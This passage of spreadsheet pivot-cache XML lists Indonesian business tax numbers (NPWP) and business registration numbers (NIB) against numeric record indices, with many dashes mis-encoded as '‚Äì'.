    <x v="1019"/>
    <s v="npwp"/>
    <s v="45‚Äì631‚Äì597‚Äì7‚Äì403‚Äì000"/>
  </r>
  <r>
    <x v="1020"/>
    <s v="npwp"/>
    <s v="02‚Äì592‚Äì947‚Äì2‚Äì027‚Äì000"/>
  </r>
  <r>
    <x v="1020"/>
    <s v="nib"/>
    <n v="8120118281711"/>
  </r>
  <r>
    <x v="1021"/>
    <s v="npwp"/>
    <s v="01‚Äì510‚Äì676‚Äì8‚Äì612‚Äì001"/>
  </r>
  <r>
    <x v="1022"/>
    <s v="npwp"/>
    <s v="84‚Äì299‚Äì083‚Äì0‚Äì619‚Äì000"/>
  </r>
  <r>
    <x v="1023"/>
    <s v="npwp"/>
    <s v="46‚Äì835‚Äì327‚Äì1‚Äì626‚Äì000"/>
  </r>
  <r>
    <x v="1024"/>
    <s v="npwp"/>
    <s v="03‚Äì261‚Äì395‚Äì2‚Äì804‚Äì000"/>
  </r>
  <r>
    <x v="1025"/>
    <s v="npwp"/>
    <s v="01.438.617.1-641.000"/>
  </r>
  <r>
    <x v="1026"/>
    <s v="npwp"/>
    <s v="01‚Äì412‚Äì488‚Äì7‚Äì812‚Äì000"/>
  </r>
  <r>
    <x v="1026"/>
    <s v="nib"/>
    <n v="9120208161573"/>
  </r>
  <r>
    <x v="1027"/>
    <s v="npwp"/>
    <s v="84.534.271.6-801.000"/>
  </r>
  <r>
    <x v="1028"/>
    <s v="npwp"/>
    <s v="84‚Äì842‚Äì336‚Äì4‚Äì625‚Äì000"/>
  </r>
  <r>
    <x v="1029"/>
    <s v="npwp"/>
    <s v="02‚Äì175‚Äì449‚Äì4‚Äì606‚Äì000"/>
  </r>
  <r>
    <x v="1029"/>
    <s v="nib"/>
    <n v="9120107120876"/>
  </r>
  <r>
    <x v="1030"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1030"/>
    <s v="nib"/>
    <n v="8120005941898"/>
  </r>
  <r>
    <x v="1031"/>
    <s v="npwp"/>
    <s v="03‚Äì097‚Äì528‚Äì8‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1032"/>
    <s v="npwp"/>
    <s v="01‚Äì914‚Äì865‚Äì9‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="1032"/>
    <s v="nib"/>
    <n v="8120000951622"/>
  </r>
  <r>
    <x v="1033"/>
    <s v="npwp"/>
    <s v="66‚Äì431‚Äì024‚Äì0‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="1034"/>
    <s v="npwp"/>
    <s v="02‚Äì040‚Äì554‚Äì4‚Äì028‚Äì000"/>
  </r>
  <r>
    <x v="1035"/>
    <s v="npwp"/>
    <s v="76‚Äì995‚Äì281‚Äì3‚Äì727‚Äì000"/>
  </r>
  <r>
    <x v="1035"/>
    <s v="nib"/>
    <n v="8120002880333"/>
  </r>
  <r>
    <x v="1036"/>
    <s v="npwp"/>
    <s v="07‚Äì850‚Äì567‚Äì4‚Äì603‚Äì000"/>
  </r>
  <r>
    <x v="1036"/>
    <s v="nib"/>
    <n v="8120213140256"/>
  </r>
  <r>
    <x v="1037"/>
    <s v="npwp"/>
    <s v="02‚Äì312‚Äì129‚Äì6‚Äì052‚Äì000"/>
  </r>
  <r>
    <x v="1038"/>
    <s v="npwp"/>
    <s v="02.629.276.3-415.000"/>
  </r>
  <r>
    <x v="1039"/>
    <s v="npwp"/>
    <s v="31‚Äì185‚Äì596‚Äì8‚Äì733‚Äì000"/>
  </r>
  <r>
    <x v="1040"/>
    <s v="npwp"/>
    <s v="21‚Äì104‚Äì604‚Äì0‚Äì416‚Äì000"/>
  </r>
  <r>
    <x v="1040"/>
    <s v="nib"/>
    <n v="8120001802818"/>
  </r>
  <r>
    <x v="1041"/>
    <s v="npwp"/>
    <s v="02‚Äì477‚Äì156‚Äì0‚Äì311‚Äì000"/>
  </r>
  <r>
    <x v="1042"/>
    <s v="npwp"/>
    <s v="07‚Äì356‚Äì884‚Äì2‚Äì311‚Äì000"/>
  </r>
  <r>
    <x v="1043"/>
    <s v="npwp"/>
    <s v="82‚Äì632‚Äì962‚Äì5‚Äì115‚Äì000"/>
  </r>
  <r>
    <x v="1043"/>
    <s v="nib"/>
    <n v="8120000992008"/>
  </r>
  <r>
    <x v="1044"/>
    <s v="npwp"/>
    <s v="14‚Äì158‚Äì963‚Äì0‚Äì115‚Äì000"/>
  </r>
  <r>
    <x v="1044"/>
    <s v="nib"/>
    <n v="8120203941393"/>
  </r>
  <r>
    <x v="1045"/>
    <s v="npwp"/>
    <s v="71‚Äì585‚Äì202‚Äì6‚Äì125‚Äì000"/>
  </r>
  <r>
    <x v="1045"/>
    <s v="nib"/>
    <n v="8120009880175"/>
  </r>
  <r>
    <x v="1046"/>
    <s v="npwp"/>
    <s v="09‚Äì212‚Äì339‚Äì7‚Äì403‚Äì000"/>
  </r>
  <r>
    <x v="1047"/>
    <s v="npwp"/>
    <s v="85‚Äì226‚Äì600‚Äì6‚Äì507‚Äì000"/>
  </r>
  <r>
    <x v="1047"/>
    <s v="nib"/>
    <n v="8120003833308"/>
  </r>
  <r>
    <x v="1048"/>
    <s v="npwp"/>
    <s v="01‚Äì309‚Äì254‚Äì9‚Äì431‚Äì000"/>
  </r>
  <r>
    <x v="1049"/>
    <s v="npwp"/>
    <s v="01‚Äì528‚Äì651‚Äì1‚Äì415‚Äì000"/>
  </r>
  <r>
    <x v="1050"/>
    <s v="npwp"/>
    <s v="71‚Äì420‚Äì229‚Äì8‚Äì121‚Äì000"/>
  </r>
  <r>
    <x v="1051"/>
    <s v="npwp"/>
    <s v="01‚Äì735‚Äì628‚Äì8‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1051"/>
    <s v="nib"/>
    <n v="8120011102856"/>
  </r>
  <r>
    <x v="1052"/>
    <s v="npwp"/>
    <s v="83‚Äì286‚Äì893‚Äì9‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="1052"/>
    <s v="nib"/>
    <n v="8120312031795"/>
  </r>
  <r>
    <x v="1053"/>
    <s v="npwp"/>
    <s v="86‚Äì016‚Äì835‚Äì0‚Äì809‚Äì000"/>
  </r>
  <r>
    <x v="1054"/>
    <s v="npwp"/>
    <s v="01‚Äì061‚Äì076‚Äì4‚Äì645‚Äì001"/>
  </r>
  <r>
    <x v="1054"/>
    <s v="nib"/>
    <n v="8120110232884"/>
  </r>
  <r>
    <x v="1055"/>
    <s v="npwp"/>
    <s v="75‚Äì380‚Äì853‚Äì4‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="1055"/>
    <s v="nib"/>
    <n v="8120106880083"/>
  </r>
  <r>
    <x v="1056"/>
    <s v="npwp"/>
    <s v="71‚Äì715‚Äì857‚Äì0‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="1056"/>
    <s v="nib"/>
    <n v="9120309131906"/>
  </r>
  <r>
    <x v="1057"/>
    <s v="npwp"/>
    <s v="03‚Äì287‚Äì264‚Äì0‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1058"/>
    <s v="npwp"/>
    <s v="57‚Äì487‚Äì727‚Äì0‚Äì808‚Äì000"/>
  </r>
  <r>
    <x v="1059"/>
    <s v="npwp"/>
    <s v="01‚Äì061‚Äì076‚Äì4‚Äì214‚Äì001"/>
  </r>
  <r>
    <x v="1060"/>
    <s v="npwp"/>
    <s v="21‚Äì010‚Äì764‚Äì5‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="1060"/>
    <s v="nib"/>
    <n v="8120106851145"/>
  </r>
  <r>
    <x v="1061"/>
    <s v="npwp"/>
    <s v="01‚Äì061‚Äì076‚Äì4‚Äì093‚Äì000"/>
  </r>
  <r>
    <x v="1062"/>
    <s v="npwp"/>
    <s v="03‚Äì216‚Äì939‚Äì3‚Äì805‚Äì000"/>
  </r>
  <r>
    <x v="1063"/>
    <s v="npwp"/>
    <s v="73‚Äì728‚Äì366‚Äì3‚Äì655‚Äì000"/>
  </r>
  <r>
    <x v="1063"/>
    <s v="nib"/>
    <n v="8120114102467"/>
  </r>
  <r>
    <x v="1064"/>
    <s v="npwp"/>
    <s v="01‚Äì661‚Äì341‚Äì6‚Äì326‚Äì000"/>
  </r>
  <r>
    <x v="1064"/>
    <s v="nib"/>
    <n v="8120307870726"/>
  </r>
  <r>
    <x v="1065"/>
    <s v="npwp"/>
    <s v="99‚Äì991‚Äì929‚Äì2‚Äì929‚Äì299"/>
  </r>
  <r>
    <x v="1066"/>
    <s v="npwp"/>
    <s v="82‚Äì281‚Äì005‚Äì7‚Äì101‚Äì000"/>
  </r>
  <r>
    <x v="1066"/>
    <s v="nib"/>
    <n v="9120106372302"/>
  </r>
  <r>
    <x v="1067"/>
    <s v="npwp"/>
    <s v="12‚Äì345‚Äì678‚Äì9‚Äì101‚Äì112"/>
  </r>
  <r>
    <x v="1068"/>
    <s v="npwp"/>
    <s v="12‚Äì345‚Äì678‚Äì9‚Äì101‚Äì112"/>
  </r>
  <r>
    <x v="1069"/>
    <s v="npwp"/>
    <s v="01‚Äì670‚Äì199‚Äì7‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="1070"/>
    <s v="npwp"/>
    <s v="16‚Äì707‚Äì723‚Äì9‚Äì311‚Äì000"/>
  </r>
  <r>
    <x v="1071"/>
    <s v="npwp"/>
    <s v="31‚Äì523‚Äì512‚Äì7‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="1071"/>
    <s v="nib"/>
    <n v="8120201820811"/>
  </r>
  <r>
    <x v="1072"/>
    <s v="npwp"/>
    <s v="31‚Äì539‚Äì199‚Äì5‚Äì416‚Äì000"/>
  </r>
  <r>
    <x v="1072"/>
    <s v="nib"/>
    <n v="8120108860612"/>
  </r>
  <r>
    <x v="1073"/>
    <s v="npwp"/>
    <s v="02‚Äì710‚Äì662‚Äì4‚Äì213‚Äì000"/>
  </r>
  <r>
    <x v="1074"/>
    <s v="npwp"/>
    <s v="03‚Äì328‚Äì912‚Äì5‚Äì831‚Äì000"/>
  </r>
  <r>
    <x v="1075"/>
    <s v="npwp"/>
    <s v="09‚Äì600‚Äì276‚Äì1‚Äì331‚Äì000"/>
  </r>
  <r>
    <x v="1076"/>
    <s v="npwp"/>
    <s v="72‚Äì834‚Äì020‚Äì9‚Äì701‚Äì000"/>
  </r>
  <r>
    <x v="1077"/>
    <s v="npwp"/>
    <s v="01‚Äì833‚Äì008‚Äì4‚Äì804‚Äì000"/>
  </r>
  <r>
    <x v="1078"/>
    <s v="npwp"/>
    <s v="82‚Äì113‚Äì724‚Äì7‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1078"/>
    <s v="nib"/>
    <n v="8120012261562"/>
  </r>
  <r>
    <x v="1079"/>
    <s v="npwp"/>
    <s v="31‚Äì666‚Äì592‚Äì8‚Äì615‚Äì000"/>
  </r>
  <r>
    <x v="1079"/>
    <s v="nib"/>
    <n v="8120001862128"/>
  </r>
  <r>
    <x v="1080"/>
    <s v="npwp"/>
    <s v="02‚Äì534‚Äì679‚Äì2‚Äì017‚Äì000"/>
  </r>
  <r>
    <x v="1080"/>
    <s v="nib"/>
    <n v="9120105420528"/>
  </r>
  <r>
    <x v="1081"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1081"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1082"/>
    <s v="npwp"/>
    <s v="02‚Äì652‚Äì243‚Äì3‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="1083"/>
    <s v="npwp"/>
    <s v="03‚Äì264‚Äì503‚Äì8‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1083"/>
    <s v="nib"/>
    <n v="8120009800997"/>
  </r>
  <r>
    <x v="1084"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1084"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1085"/>
    <s v="npwp"/>
    <s v="02‚Äì193‚Äì034‚Äì2‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="1085"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1086"/>
    <s v="npwp"/>
    <s v="02‚Äì602‚Äì597‚Äì3‚Äì432‚Äì000"/>
  </r>
  <r>
    <x v="1086"/>
    <s v="nib"/>
    <n v="8120105891466"/>
  </r>
  <r>
    <x v="1087"/>
    <s v="npwp"/>
    <s v="78‚Äì995‚Äì840‚Äì2‚Äì617‚Äì000"/>
  </r>
  <r>
    <x v="1088"/>
    <s v="npwp"/>
    <s v="24‚Äì431‚Äì761‚Äì6‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="1088"/>
    <s v="nib"/>
    <n v="9120207500082"/>
  </r>
  <r>
    <x v="1089"/>
    <s v="npwp"/>
    <s v="66‚Äì719‚Äì533‚Äì3‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1090"/>
    <s v="npwp"/>
    <s v="31‚Äì808‚Äì100‚Äì7‚Äì451‚Äì000"/>
  </r>
  <r>
    <x v="1091"/>
    <s v="npwp"/>
    <s v="84‚Äì977‚Äì214‚Äì0‚Äì809‚Äì000"/>
  </r>
  <r>
    <x v="1091"/>
    <s v="nib"/>
    <n v="8120118050532"/>
  </r>
  <r>
    <x v="1092"/>
    <s v="npwp"/>
    <s v="81‚Äì291‚Äì835‚Äì7‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="1092"/>
    <s v="nib"/>
    <n v="8120101961291"/>
  </r>
  <r>
    <x v="1093"/>
    <s v="npwp"/>
    <s v="01.061.797.5-058.000"/>
  </r>
  <r>
    <x v="1093"/>
    <s v="nib"/>
    <n v="8120015280138"/>
  </r>
  <r>
    <x v="1094"/>
    <s v="npwp"/>
    <s v="31‚Äì153‚Äì639‚Äì5‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="1095"/>
    <s v="npwp"/>
    <s v="02‚Äì032‚Äì738‚Äì3‚Äì812‚Äì000"/>
  </r>
  <r>
    <x v="1096"/>
    <s v="npwp"/>
    <s v="80‚Äì494‚Äì397‚Äì5‚Äì625‚Äì000"/>
  </r>
  <r>
    <x v="1096"/>
    <s v="nib"/>
    <n v="8120119092159"/>
  </r>
  <r>
    <x v="1097"/>
    <s v="npwp"/>
    <s v="72‚Äì892‚Äì260‚Äì0‚Äì809‚Äì001"/>
  </r>
  <r>
    <x v="1097"/>
    <s v="nib"/>
    <n v="8120010030844"/>
  </r>
  <r>
    <x v="1098"/>
    <s v="npwp"/>
    <s v="01‚Äì070‚Äì707‚Äì3‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="1098"/>
    <s v="nib"/>
    <n v="8120219101125"/>
  </r>
  <r>
    <x v="1099"/>
    <s v="npwp"/>
    <s v="01‚Äì061‚Äì864‚Äì3‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="1099"/>
    <s v="nib"/>
    <n v="8120017131157"/>
  </r>
  <r>
    <x v="1100"/>
    <s v="npwp"/>
    <s v="02‚Äì442‚Äì448‚Äì3‚Äì941‚Äì000"/>
  </r>
  <r>
    <x v="1101"/>
    <s v="npwp"/>
    <s v="02‚Äì571‚Äì619‚Äì2‚Äì941‚Äì000"/>
  </r>
  <r>
    <x v="1102"/>
    <s v="npwp"/>
    <s v="81‚Äì029‚Äì586‚Äì5‚Äì822‚Äì000"/>
  </r>
  <r>
    <x v="1102"/>
    <s v="nib"/>
    <n v="285010082442"/>
  </r>
  <r>
    <x v="1103"/>
    <s v="npwp"/>
    <s v="01‚Äì568‚Äì084‚Äì6‚Äì605‚Äì000"/>
  </r>
  <r>
    <x v="1103"/>
    <s v="nib"/>
    <n v="8120008842734"/>
  </r>
  <r>
    <x v="1104"/>
    <s v="npwp"/>
    <s v="01‚Äì002‚Äì081‚Äì6‚Äì052‚Äì000"/>
  </r>
  <r>
    <x v="1104"/>
    <s v="nib"/>
    <n v="8120008821209"/>
  </r>
  <r>
    <x v="1105"/>
    <s v="npwp"/>
    <s v="73‚Äì340‚Äì207‚Äì0‚Äì410‚Äì000"/>
  </r>
  <r>
    <x v="1105"/>
    <s v="nib"/>
    <n v="8120108871546"/>
  </r>
  <r>
    <x v="1106"/>
    <s v="npwp"/>
    <s v="74‚Äì832‚Äì846‚Äì5‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="1107"/>
    <s v="npwp"/>
    <s v="01‚Äì409‚Äì482‚Äì5‚Äì617‚Äì001"/>
  </r>
  <r>
    <x v="1108"/>
    <s v="npwp"/>
    <s v="02‚Äì343‚Äì781‚Äì7‚Äì702‚Äì000"/>
  </r>
  <r>
    <x v="1108"/>
    <s v="nib"/>
    <n v="8120110011504"/>
  </r>
  <r>
    <x v="1109"/>
    <s v="npwp"/>
    <n v="14540199325001"/>
  </r>
  <r>
    <x v="1110"/>
    <s v="npwp"/>
    <s v="80‚Äì303‚Äì451‚Äì1‚Äì325‚Äì000"/>
  </r>
  <r>
    <x v="1111"/>
    <s v="npwp"/>
    <s v="74‚Äì040‚Äì809‚Äì1‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1112"/>
    <s v="npwp"/>
    <s v="01‚Äì990‚Äì100‚Äì8‚Äì903‚Äì000"/>
  </r>
  <r>
    <x v="1112"/>
    <s v="nib"/>
    <n v="8120109830812"/>
  </r>
  <r>
    <x v="1113"/>
    <s v="npwp"/>
    <s v="85‚Äì381‚Äì638‚Äì7‚Äì701‚Äì000"/>
  </r>
  <r>
    <x v="1113"/>
    <s v="nib"/>
    <n v="8120004901136"/>
  </r>
  <r>
    <x v="1114"/>
    <s v="npwp"/>
    <s v="83‚Äì452‚Äì876‚Äì2‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1114"/>
    <s v="nib"/>
    <n v="9120002771752"/>
  </r>
  <r>
    <x v="1115"/>
    <s v="npwp"/>
    <s v="66‚Äì822‚Äì862‚Äì0‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="1115"/>
    <s v="nib"/>
    <n v="8120006900352"/>
  </r>
  <r>
    <x v="1116"/>
    <s v="npwp"/>
    <s v="73‚Äì304‚Äì500‚Äì9‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="1116"/>
    <s v="nib"/>
    <n v="8120312171951"/>
  </r>
  <r>
    <x v="1117"/>
    <s v="npwp"/>
    <s v="02‚Äì825‚Äì856‚Äì4‚Äì615‚Äì000"/>
  </r>
  <r>
    <x v="1117"/>
    <s v="nib"/>
    <n v="220000562284"/>
  </r>
  <r>
    <x v="1118"/>
    <s v="npwp"/>
    <s v="02‚Äì013‚Äì004‚Äì3‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1119"/>
    <s v="npwp"/>
    <s v="71‚Äì542‚Äì510‚Äì7‚Äì008‚Äì000"/>
  </r>
  <r>
    <x v="1119"/>
    <s v="nib"/>
    <n v="8120001021697"/>
  </r>
  <r>
    <x v="1120"/>
    <s v="npwp"/>
    <s v="01‚Äì644‚Äì559‚Äì5‚Äì059‚Äì000"/>
  </r>
  <r>
    <x v="1120"/>
    <s v="nib"/>
    <n v="8120005801801"/>
  </r>
  <r>
    <x v="1121"/>
    <s v="npwp"/>
    <s v="85‚Äì332‚Äì013‚Äì3‚Äì951‚Äì000"/>
  </r>
  <r>
    <x v="1121"/>
    <s v="nib"/>
    <n v="8120116102673"/>
  </r>
  <r>
    <x v="1122"/>
    <s v="npwp"/>
    <s v="06.548.860.3‚Äì951.000"/>
  </r>
  <r>
    <x v="1123"/>
    <s v="npwp"/>
    <s v="84‚Äì423‚Äì065‚Äì6‚Äì503‚Äì000"/>
  </r>
  <r>
    <x v="1123"/>
    <s v="nib"/>
    <n v="8120016013414"/>
  </r>
  <r>
    <x v="1124"/>
    <s v="npwp"/>
    <s v="81‚Äì733‚Äì564‚Äì9‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="1125"/>
    <s v="npwp"/>
    <s v="73‚Äì468‚Äì724‚Äì7‚Äì951‚Äì000"/>
  </r>
  <r>
    <x v="1126"/>
    <s v="npwp"/>
    <s v="86‚Äì941‚Äì356‚Äì7‚Äì503‚Äì000"/>
  </r>
  <r>
    <x v="1126"/>
    <s v="nib"/>
    <n v="9120101120539"/>
  </r>
  <r>
    <x v="1127"/>
    <s v="npwp"/>
    <s v="80‚Äì386‚Äì579‚Äì9‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1127"/>
    <s v="nib"/>
    <n v="8120214051495"/>
  </r>
  <r>
    <x v="1128"/>
    <s v="npwp"/>
    <s v="72‚Äì970‚Äì946‚Äì9‚Äì941‚Äì000"/>
  </r>
  <r>
    <x v="1129"/>
    <s v="npwp"/>
    <s v="66‚Äì719‚Äì533‚Äì3‚Äì807‚Äì001"/>
  </r>
  <r>
    <x v="1129"/>
    <s v="nib"/>
    <n v="9120001181189"/>
  </r>
  <r>
    <x v="1130"/>
    <s v="npwp"/>
    <s v="66‚Äì719‚Äì533‚Äì3‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1130"/>
    <s v="nib"/>
    <n v="9120001181189"/>
  </r>
  <r>
    <x v="1131"/>
    <s v="npwp"/>
    <s v="02‚Äì069‚Äì816‚Äì3‚Äì511‚Äì000"/>
  </r>
  <r>
    <x v="1131"/>
    <s v="nib"/>
    <n v="8120014151279"/>
  </r>
  <r>
    <x v="1132"/>
    <s v="npwp"/>
    <s v="02‚Äì189‚Äì571‚Äì9‚Äì037‚Äì000"/>
  </r>
  <r>
    <x v="1132"/>
    <s v="nib"/>
    <n v="8120002841036"/>
  </r>
  <r>
    <x v="1133"/>
    <s v="npwp"/>
    <s v="02‚Äì919‚Äì811‚Äì6‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1133"/>
    <s v="nib"/>
    <n v="9120200740351"/>
  </r>
  <r>
    <x v="1134"/>
    <s v="npwp"/>
    <s v="01‚Äì330‚Äì420‚Äì9‚Äì019‚Äì000"/>
  </r>
  <r>
    <x v="1134"/>
    <s v="nib"/>
    <n v="8120100831732"/>
  </r>
  <r>
    <x v="1135"/>
    <s v="npwp"/>
    <s v="83‚Äì389‚Äì722‚Äì6‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1136"/>
    <s v="npwp"/>
    <s v="57‚Äì401‚Äì027‚Äì8‚Äì627‚Äì000"/>
  </r>
  <r>
    <x v="1137"/>
    <s v="npwp"/>
    <s v="83‚Äì353‚Äì333‚Äì4‚Äì906‚Äì000"/>
  </r>
  <r>
    <x v="1137"/>
    <s v="nib"/>
    <n v="8120101920879"/>
  </r>
  <r>
    <x v="1138"/>
    <s v="npwp"/>
    <s v="01‚Äì876‚Äì267‚Äì4‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1139"/>
    <s v="npwp"/>
    <s v="36‚Äì924‚Äì044‚Äì5‚Äì901‚Äì000"/>
  </r>
  <r>
    <x v="1139"/>
    <s v="nib"/>
    <n v="8120102981145"/>
  </r>
  <r>
    <x v="1140"/>
    <s v="npwp"/>
    <s v="84‚Äì436‚Äì106‚Äì3‚Äì941‚Äì000"/>
  </r>
  <r>
    <x v="1140"/>
    <s v="nib"/>
    <n v="8120006931042"/>
  </r>
  <r>
    <x v="1141"/>
    <s v="npwp"/>
    <s v="02‚Äì069‚Äì816‚Äì3‚Äì511‚Äì000"/>
  </r>
  <r>
    <x v="1141"/>
    <s v="nib"/>
    <n v="8120014151279"/>
  </r>
  <r>
    <x v="1142"/>
    <s v="npwp"/>
    <s v="91‚Äì320‚Äì727‚Äì0‚Äì101‚Äì000"/>
  </r>
  <r>
    <x v="1142"/>
    <s v="nib"/>
    <n v="9120301580829"/>
  </r>
  <r>
    <x v="1143"/>
    <s v="npwp"/>
    <s v="73‚Äì405‚Äì403‚Äì7‚Äì625‚Äì000"/>
  </r>
  <r>
    <x v="1143"/>
    <s v="nib"/>
    <n v="8120214010025"/>
  </r>
  <r>
    <x v="1144"/>
    <s v="npwp"/>
    <s v="86-108-966-2-603-000"/>
  </r>
  <r>
    <x v="1145"/>
    <s v="npwp"/>
    <s v="31‚Äì706‚Äì571‚Äì2‚Äì941‚Äì000"/>
  </r>
  <r>
    <x v="1146"/>
    <s v="npwp"/>
    <s v="06‚Äì909‚Äì714‚Äì5‚Äì311‚Äì000"/>
  </r>
  <r>
    <x v="1146"/>
    <s v="nib"/>
    <n v="8120115140663"/>
  </r>
  <r>
    <x v="1147"/>
    <s v="npwp"/>
    <s v="02‚Äì259‚Äì697‚Äì7‚Äì126‚Äì000"/>
  </r>
  <r>
    <x v="1147"/>
    <s v="nib"/>
    <n v="8120310140276"/>
  </r>
  <r>
    <x v="1148"/>
    <s v="npwp"/>
    <s v="02‚Äì534‚Äì679‚Äì2‚Äì017‚Äì000"/>
  </r>
  <r>
    <x v="1148"/>
    <s v="nib"/>
    <n v="9120105420528"/>
  </r>
  <r>
    <x v="1149"/>
    <s v="npwp"/>
    <s v="75‚Äì555‚Äì151‚Äì3‚Äì335‚Äì000"/>
  </r>
  <r>
    <x v="1150"/>
    <s v="npwp"/>
    <s v="73‚Äì371‚Äì539‚Äì5‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="1150"/>
    <s v="nib"/>
    <n v="8120003900213"/>
  </r>
  <r>
    <x v="1151"/>
    <s v="npwp"/>
    <s v="83‚Äì908‚Äì126‚Äì2‚Äì453‚Äì000"/>
  </r>
  <r>
    <x v="1151"/>
    <s v="nib"/>
    <n v="8120000920583"/>
  </r>
  <r>
    <x v="1152"/>
    <s v="npwp"/>
    <s v="03‚Äì040‚Äì929‚Äì6‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="1152"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1153"/>
    <s v="npwp"/>
    <s v="02‚Äì919‚Äì664‚Äì9‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1153"/>
    <s v="nib"/>
    <n v="8120104891509"/>
  </r>
  <r>
    <x v="1154"/>
    <s v="npwp"/>
    <s v="03‚Äì129‚Äì154‚Äì5‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1155"/>
    <s v="npwp"/>
    <s v="85‚Äì538‚Äì184‚Äì4‚Äì503‚Äì000"/>
  </r>
  <r>
    <x v="1155"/>
    <s v="nib"/>
    <n v="8120219073712"/>
  </r>
  <r>
    <x v="1156"/>
    <s v="npwp"/>
    <s v="01‚Äì233‚Äì310‚Äì0‚Äì643‚Äì001"/>
  </r>
  <r>
    <x v="1156"/>
    <s v="nib"/>
    <n v="8120001820245"/>
  </r>
  <r>
    <x v="1157"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1157"/>
    <s v="nib"/>
    <n v="8120313170429"/>
  </r>
  <r>
    <x v="1158"/>
    <s v="npwp"/>
    <s v="01‚Äì278‚Äì337‚Äì9‚Äì655‚Äì001"/>
  </r>
  <r>
    <x v="1158"/>
    <s v="nib"/>
    <n v="8120000870519"/>
  </r>
  <r>
    <x v="1159"/>
    <s v="npwp"/>
    <s v="71‚Äì003‚Äì722‚Äì7‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="1159"/>
    <s v="nib"/>
    <n v="8120218180923"/>
  </r>
  <r>
    <x v="1160"/>
    <s v="npwp"/>
    <s v="21‚Äì118‚Äì829‚Äì7‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1160"/>
    <s v="nib"/>
    <n v="8120314011064"/>
  </r>
  <r>
    <x v="1161"/>
    <s v="npwp"/>
    <s v="86-108-966-2-603-000"/>
  </r>
  <r>
    <x v="1161"/>
    <s v="nib"/>
    <n v="8120118000139"/>
  </r>
  <r>
    <x v="1162"/>
    <s v="npwp"/>
    <s v="03‚Äì218‚Äì352‚Äì5‚Äì801‚Äì003"/>
  </r>
  <r>
    <x v="1162"/>
    <s v="nib"/>
    <n v="9120007190831"/>
  </r>
  <r>
    <x v="1163"/>
    <s v="npwp"/>
    <s v="16‚Äì286‚Äì465‚Äì6‚Äì203‚Äì000"/>
  </r>
  <r>
    <x v="1163"/>
    <s v="nib"/>
    <n v="9120006921696"/>
  </r>
  <r>
    <x v="1164"/>
    <s v="npwp"/>
    <s v="80‚Äì474‚Äì359‚Äì9‚Äì225‚Äì000"/>
  </r>
  <r>
    <x v="1164"/>
    <s v="nib"/>
    <n v="8120117141396"/>
  </r>
  <r>
    <x v="1165"/>
    <s v="npwp"/>
    <s v="70‚Äì242‚Äì516‚Äì6‚Äì215‚Äì000"/>
  </r>
  <r>
    <x v="1165"/>
    <s v="nib"/>
    <n v="9120003183408"/>
  </r>
  <r>
    <x v="1166"/>
    <s v="npwp"/>
    <s v="84‚Äì885‚Äì768‚Äì6‚Äì026‚Äì000"/>
  </r>
  <r>
    <x v="1166"/>
    <s v="nib"/>
    <n v="8120102842841"/>
  </r>
  <r>
    <x v="1167"/>
    <s v="npwp"/>
    <s v="02‚Äì046‚Äì906‚Äì0‚Äì903‚Äì000"/>
  </r>
  <r>
    <x v="1167"/>
    <s v="nib"/>
    <n v="1201000120292"/>
  </r>
  <r>
    <x v="1168"/>
    <s v="npwp"/>
    <s v="85‚Äì181‚Äì392‚Äì3‚Äì215‚Äì000"/>
  </r>
  <r>
    <x v="1168"/>
    <s v="nib"/>
    <n v="8120201890089"/>
  </r>
  <r>
    <x v="1169"/>
    <s v="npwp"/>
    <s v="01.438.617.1-641.000"/>
  </r>
  <r>
    <x v="1170"/>
    <s v="npwp"/>
    <s v="45‚Äì969‚Äì644‚Äì9‚Äì017‚Äì000"/>
  </r>
  <r>
    <x v="1170"/>
    <s v="nib"/>
    <n v="8120109712754"/>
  </r>
  <r>
    <x v="1171"/>
    <s v="npwp"/>
    <s v="74‚Äì836‚Äì650‚Äì7‚Äì307‚Äì000"/>
  </r>
  <r>
    <x v="1171"/>
    <s v="nib"/>
    <n v="8120110091775"/>
  </r>
